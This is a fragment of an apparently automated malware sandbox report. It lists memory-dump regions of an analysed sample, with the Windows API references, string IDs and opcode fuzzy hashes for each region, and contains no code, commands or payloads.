                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 7af379fb91929977c6bec91fed327ebc37bde50f21470a49cba70077e7e982b2
                                            • Instruction ID: a0f1d4522bfd32c5a07d34c90d5019c0eab4ed2a8945586afcba6ca246332e74
                                            • Opcode Fuzzy Hash: 7af379fb91929977c6bec91fed327ebc37bde50f21470a49cba70077e7e982b2
                                            • Instruction Fuzzy Hash: E731BCB4D112589FCB10DFA9D584AEEFBF0AF09310F24902AE818B7350D778A944CF64
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 0526C4DB
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: e3421949cfeeeb3aa69e50a37809ca51cf18dcde04f170a95db44580f268b4ed
                                            • Instruction ID: 3b845363b28b080c53e446a4d83695f4c417f162c0031d2a09c3cbd9e90094ea
                                            • Opcode Fuzzy Hash: e3421949cfeeeb3aa69e50a37809ca51cf18dcde04f170a95db44580f268b4ed
                                            • Instruction Fuzzy Hash: CA319BB4D012589FCB10DFA9E584AAEFBF4AF49310F24905AE818B7250D778A944CF64
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 0526C845
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: e409ccbd8e1d66112ac31c7652f0ea9d6c6e37a478f4e20e7314bef5851304b6
                                            • Instruction ID: 9c35b136f06a6343c30253ec8a81acd77fd7e23f69f745ace1fc36fb55b91203
                                            • Opcode Fuzzy Hash: e409ccbd8e1d66112ac31c7652f0ea9d6c6e37a478f4e20e7314bef5851304b6
                                            • Instruction Fuzzy Hash: 323196B4D112589FCB10DFA9D984A9EFBF5AF09310F14902AE819B7310C775A941CFA4
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 0526C845
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2643796409.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5260000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: d51c4d9241f7fda7a6e6c4fb956813033726d131e45696b32d0c3cbe43fadb0b
                                            • Instruction ID: 6dbf3030862890ede3b2bd148bcf36409bb3c05b04cc75a29ca9f88d234bf2a6
                                            • Opcode Fuzzy Hash: d51c4d9241f7fda7a6e6c4fb956813033726d131e45696b32d0c3cbe43fadb0b
                                            • Instruction Fuzzy Hash: 6031A7B4D112589FCB10DFA9D984A9EFBF5BF09310F10902AE818B3310C775A941CFA4
                                            APIs
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            • SysAllocString.OLEAUT32 ref: 6896EA8D
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: AllocString_malloc
                                            • String ID:
                                            • API String ID: 959018026-0
                                            • Opcode ID: ef2c1520639b81e34d56689e3b7de6bba8f9fea7ab9f4e519752e405caa9ccc1
                                            • Instruction ID: 3d4ba3f444207b5a8aca2a3d24b0e9b99c45deadf0df6f5e0c1776281c6d5a36
                                            • Opcode Fuzzy Hash: ef2c1520639b81e34d56689e3b7de6bba8f9fea7ab9f4e519752e405caa9ccc1
                                            • Instruction Fuzzy Hash: E6018075904655EBE310CF98C904B6AB7A8FB05B28F50435AE865A7380D7B6D9408BD1
                                            APIs
                                            • __EH_prolog3_catch.LIBCMT ref: 689AE8DC
                                              • Part of subcall function 689A9BB5: _malloc.LIBCMT ref: 689A9BCF
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: H_prolog3_catch_malloc
                                            • String ID:
                                            • API String ID: 529455676-0
                                            • Opcode ID: e18f9d2832c1047159e9b6a6c0adbdf117bffe0258df3e0194034c074532ac36
                                            • Instruction ID: dd28b1a6be05524c616ee08d5f8a25cfb81597045a98ea5d8c03656056329a38
                                            • Opcode Fuzzy Hash: e18f9d2832c1047159e9b6a6c0adbdf117bffe0258df3e0194034c074532ac36
                                            • Instruction Fuzzy Hash: 8BD05E3991420897CF41EB98C509B7D7BB0AB81329FD00065E0087A280DB72CA008796
                                            APIs
                                            • ___security_init_cookie.LIBCMT ref: 689AA510
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ___security_init_cookie
                                            • String ID:
                                            • API String ID: 3657697845-0
                                            • Opcode ID: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
                                            • Instruction ID: 000165e5ea25f4d0c5fe48f3001be1cbcd596a29ddd09b3b13981b88b5cd789b
                                            • Opcode Fuzzy Hash: 27b748a9c275510458f0068f842967d98f7d0f67ac18c1338cd75791cb2cbf1f
                                            • Instruction Fuzzy Hash: 15C09B391043089F8B04CF10F440C7E7755AB64228760D115FC18167509B31D561D754
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8aq
                                            • API String ID: 0-538729646
                                            • Opcode ID: dabf4d2ca8a46dd9f2806c6f7dc4d3dceb551974f8569d34284f15676158f051
                                            • Instruction ID: 0c5c0487bb4d19eea9ab6765fe64931a4648de85269436574a8ec257cceafdb2
                                            • Opcode Fuzzy Hash: dabf4d2ca8a46dd9f2806c6f7dc4d3dceb551974f8569d34284f15676158f051
                                            • Instruction Fuzzy Hash: 06411774D06228CFCB04DFA9D5846EDBBF6BF89300F14A42AE405B7260DB389949DF64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Haq
                                            • API String ID: 0-725504367
                                            • Opcode ID: 7a59f2c99938849ce15a88d2c0fc423050f4c1af7a027978257ce03565b80833
                                            • Instruction ID: 0362fb7cc22d044e18c314a54d7c12823c85f8236c7ec4604de1b81c2032ba78
                                            • Opcode Fuzzy Hash: 7a59f2c99938849ce15a88d2c0fc423050f4c1af7a027978257ce03565b80833
                                            • Instruction Fuzzy Hash: 93212630A08244AFE7019F798C517FA3F7AEF85300F1088A6E546DB292DA34DE05DBA1
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 92426e3e1e4897ae6aa95fac9be48ad7c68ab4301c1121b0a9e63da97f2cb768
                                            • Instruction ID: 7725d50d7e7542b86c0ca5c48e545fd00562afda1b77f7766cce3d6bb885739d
                                            • Opcode Fuzzy Hash: 92426e3e1e4897ae6aa95fac9be48ad7c68ab4301c1121b0a9e63da97f2cb768
                                            • Instruction Fuzzy Hash: D8216030E042189BDB04EBB9D8947EFBBB6EF88710F205529D405B7294CF349D45CB61
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3cb9bc0b8b6ad2a9c5d8fb636d2fed58594c1fa4ca7c9e81cd2197591f33837d
                                            • Instruction ID: 83367a5ef6744e5e9f71013bca7f62d2b46b010357f7bb28f85fb382bb67fb63
                                            • Opcode Fuzzy Hash: 3cb9bc0b8b6ad2a9c5d8fb636d2fed58594c1fa4ca7c9e81cd2197591f33837d
                                            • Instruction Fuzzy Hash: 66319574E00209DFDB04DFE9D994AAEBBBAFF88300F108515E919A7365CB34AD46CB40
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 784bb711dea107b2ae3401f302230e97456183601d5a027452d09c7c6c159321
                                            • Instruction ID: 710016b33924b3b81794ee12a5acc4c62db1d34d49ee702249e8648f63d71683
                                            • Opcode Fuzzy Hash: 784bb711dea107b2ae3401f302230e97456183601d5a027452d09c7c6c159321
                                            • Instruction Fuzzy Hash: B4214474C08318CFCB04DFA9D8846EEBBBAFB9A300F909569D005B3251DB755A49DF50
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2658558268.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5bc0000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 530f7803fc92263716e16ed37facde2213bb4cf71e5b8d7b451b97fc72a8f8a0
                                            • Instruction ID: a37b4efa178c87f093d061f4d3edf694aec793b30bb6f634d74212c16de14c98
                                            • Opcode Fuzzy Hash: 530f7803fc92263716e16ed37facde2213bb4cf71e5b8d7b451b97fc72a8f8a0
                                            • Instruction Fuzzy Hash: 4721D1353012048FCB05EBA8D898ABD7BF5EF8962070540EAE509CB372DB34DD00CBA0
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2483107229.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_fbd000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f9bc5d2d6c9bba782a97242d3eade06b2946948d0aa520da96063a896f0ca42
                                            • Instruction ID: 891dcf7a62c1cc1773fe57f79eb51d5a31bfff92b669619383b7f0586dcfad52
                                            • Opcode Fuzzy Hash: 0f9bc5d2d6c9bba782a97242d3eade06b2946948d0aa520da96063a896f0ca42
                                            • Instruction Fuzzy Hash: 0C21F272904244DFDB05DF14D9C0B66BB69FB88324F248569E9090B256D33AD80AEFA3
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2658558268.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5bc0000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c51cc8978f8a37c16806461df23969573725899821cdedcebcb53012007afd40
                                            • Instruction ID: b7ad80bb0bce3f9fd6ca1f34c2939ea4908bc716c55bf66d2d7e3c1d197e4cb0
                                            • Opcode Fuzzy Hash: c51cc8978f8a37c16806461df23969573725899821cdedcebcb53012007afd40
                                            • Instruction Fuzzy Hash: F8215C74A102058FCB14DF68D5A0A6EBBF3AF84310F55C999E856DB394DB34EC42CB85
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2483107229.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_fbd000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b6160d1ee4751f17d55acd583ca31d699f19b5f590f8f57745d8d60c2b26af0e
                                            • Instruction ID: b0d7de2df232246df50125a4b8b42d91cdac8adb8e4be3e559a83364550bdfb7
                                            • Opcode Fuzzy Hash: b6160d1ee4751f17d55acd583ca31d699f19b5f590f8f57745d8d60c2b26af0e
                                            • Instruction Fuzzy Hash: 86213772904344DFCB05DF14D980B66BF69FB84324F24C569D9094B252D33AD805EBA2
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2483107229.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_fbd000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 075de7d2bbdbab6d3e4d044809441a15bc8264f1f4edfcd3d5fa3902a6eb1a23
                                            • Instruction ID: 0cbf3f561ecc384c0f4c2914f65f40a37748e085a780285ad27b605af60061ea
                                            • Opcode Fuzzy Hash: 075de7d2bbdbab6d3e4d044809441a15bc8264f1f4edfcd3d5fa3902a6eb1a23
                                            • Instruction Fuzzy Hash: 6F212372A04200EFDB14DF15D9C0B66BF69FB84328F24C569D80D0B255D33AE846DAA3
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d450030ce262be2dfed23ed1caba574d3da19a640d8a562b27daa402e5f4882f
                                            • Instruction ID: 483e64dbc6bc25bdddee5fcd9354e1e9989041b3fb4ac72f4f433e750926bc75
                                            • Opcode Fuzzy Hash: d450030ce262be2dfed23ed1caba574d3da19a640d8a562b27daa402e5f4882f
                                            • Instruction Fuzzy Hash: 17210574E08219DFCB05CF98C840AEEBBB5FF49314F008429E925A7350CB359948DFA0
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c61db8ae0bc03e5cc83970f5e77216b396ad5abe4f4a84a0a492916007808bd7
                                            • Instruction ID: 851cc15434b9d69a9cc3e427d687107ff0e118f5ceca759080d2903ebb25c7b1
                                            • Opcode Fuzzy Hash: c61db8ae0bc03e5cc83970f5e77216b396ad5abe4f4a84a0a492916007808bd7
                                            • Instruction Fuzzy Hash: F221E7B0E0521A8FCB05DFB9C940AEEBBB9AF99300F009629D415B7391DB749909CF61
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3645a0be8b8df45686c2410a4a01bb2e7d1fd893135fdd1b1ea13d70837f19e1
                                            • Instruction ID: d06973f7ee954ff869935afcea6f3bfc9ef23a14915d35756dfbb28168318fa0
                                            • Opcode Fuzzy Hash: 3645a0be8b8df45686c2410a4a01bb2e7d1fd893135fdd1b1ea13d70837f19e1
                                            • Instruction Fuzzy Hash: 2011D7B0E0521A8BCB04DFA9C940AEEBBB9BF98300F009625D415B7355DB749909CBA1
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2483107229.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_fbd000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                            • Instruction ID: 04d7b3b85edd5cdbeac6dfd14a803e22c267134a554c1b4fd2bb8e8b252bde97
                                            • Opcode Fuzzy Hash: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                            • Instruction Fuzzy Hash: 2311AC76908280CFCB12CF10D584B56BF66FB84324F2486A9D8090B656C33AD81ADFA2
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2483107229.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_fbd000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f2dc214fb3b67dee6d63525546fcd79b48668cd63b1e3b0b14567c0ac11da0e
                                            • Instruction ID: bb2044a9d375b6e645aacbe0f0c720633c4e713e8dd61f3af660848e8fbdfad7
                                            • Opcode Fuzzy Hash: 8f2dc214fb3b67dee6d63525546fcd79b48668cd63b1e3b0b14567c0ac11da0e
                                            • Instruction Fuzzy Hash: BC11E276904280CFCB16CF10D5C4B56BF71FB84324F24C6A9D8094B656C33AD81ADFA2
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2483107229.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_fbd000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7b4c623aaf12d799d01dfa0934b93cccf601b23327cf73bb2393620fe977b88f
                                            • Instruction ID: 92e666f300c2f9486578f1136faece82f3a0ef26078fbe2fe8854e3ba6114f4e
                                            • Opcode Fuzzy Hash: 7b4c623aaf12d799d01dfa0934b93cccf601b23327cf73bb2393620fe977b88f
                                            • Instruction Fuzzy Hash: E2110175904280CFDB11CF10D5C4B59BF61FB84324F28C6A9D8490B656C33AE84ACFA2
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2658558268.0000000005BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_5bc0000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 054425e28ebb712f51c52945e05bb540ab45dbce375811feed82dd00703b3d11
                                            • Instruction ID: e297b49ff537d667af60f5d1a0aeded0e16e4e14421779f8b68ee7dcbcfae435
                                            • Opcode Fuzzy Hash: 054425e28ebb712f51c52945e05bb540ab45dbce375811feed82dd00703b3d11
                                            • Instruction Fuzzy Hash: 2E015A313101109FC748EBADD899C6EBBFAEF8962435144ADF10ACB3B1DE61EC018B90
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2474791574.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_f9d000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e500725d581b4d9099f9df35ee4b8a347058d6c49ec2ae7269795d0cad4d449
                                            • Instruction ID: 7889ac4e0913fc19ca2d7086b0d094beeb66811eb2c72b55382afb9597a1c7a0
                                            • Opcode Fuzzy Hash: 1e500725d581b4d9099f9df35ee4b8a347058d6c49ec2ae7269795d0cad4d449
                                            • Instruction Fuzzy Hash: 4E012B735043049AFB209B15CD84B67BF9CEF45334F38C52AED080A286C2799881E671
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2474791574.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_f9d000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29909b13a8b4c8f9e09ae9032ba15014943807ce872131503ef321b0ed0d9e7e
                                            • Instruction ID: 8f56e778cd8682a16585ac8db8f1848645e8d4a70dcd311b7a2a35c6fc734260
                                            • Opcode Fuzzy Hash: 29909b13a8b4c8f9e09ae9032ba15014943807ce872131503ef321b0ed0d9e7e
                                            • Instruction Fuzzy Hash: 50F0C2724043449AFB208A06CC84B62FFA8EF91334F28C45AED480A286C2799840DAB1
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d07cfc480a843be0cf994c2c0b5c4d6ec828dbf297cd3e24d1667f2ebeb2efe
                                            • Instruction ID: 76128780740b57ed2ad391d811145fcae77b4ef7fd1d2f3823ce812e0194471f
                                            • Opcode Fuzzy Hash: 0d07cfc480a843be0cf994c2c0b5c4d6ec828dbf297cd3e24d1667f2ebeb2efe
                                            • Instruction Fuzzy Hash: ACF0E576C0D388CFCB11CBA4C4500E87F35DDA6250B8502D7D046DB161E635960ADB10
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 22f36d8dac510723afe4b8700071c1e181dc6366c476c249e3c0f25393050a76
                                            • Instruction ID: 5f3ac84aedffb8cea3ec4907bca8d412f3807269a613ecc7f02df1ab9f338716
                                            • Opcode Fuzzy Hash: 22f36d8dac510723afe4b8700071c1e181dc6366c476c249e3c0f25393050a76
                                            • Instruction Fuzzy Hash: C6E0ED74D0520CEFCB94DFA8D8445DDBBB5FB48310F10C1AAAC1492350D7355A54EF40
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 35b65ca9145a2ab84119d26bd044539f67faa879faaa02bb6284af82cedeb8fb
                                            • Instruction ID: d218a6efeb2620883080247a592e535369f1387b3551924577b751a547074c6c
                                            • Opcode Fuzzy Hash: 35b65ca9145a2ab84119d26bd044539f67faa879faaa02bb6284af82cedeb8fb
                                            • Instruction Fuzzy Hash: EED05B3084E12CDFC718DF6CD5445BC7BB8AB46305F405194A509232E2CF34695CDB95
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e470e463746508ecfc5e89dca5fadd51e60a677c28ab4830364f27299b2586bc
                                            • Instruction ID: 91dcbd565c5cc2e98d0accbd6f9da8b5be6ca728b6ea3d17b57074b530268494
                                            • Opcode Fuzzy Hash: e470e463746508ecfc5e89dca5fadd51e60a677c28ab4830364f27299b2586bc
                                            • Instruction Fuzzy Hash: BDD05EB081620CEFC740DFA899486AD77F8E709301F404594B808C3211DB355A14EB51
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2591460757.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_2a20000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
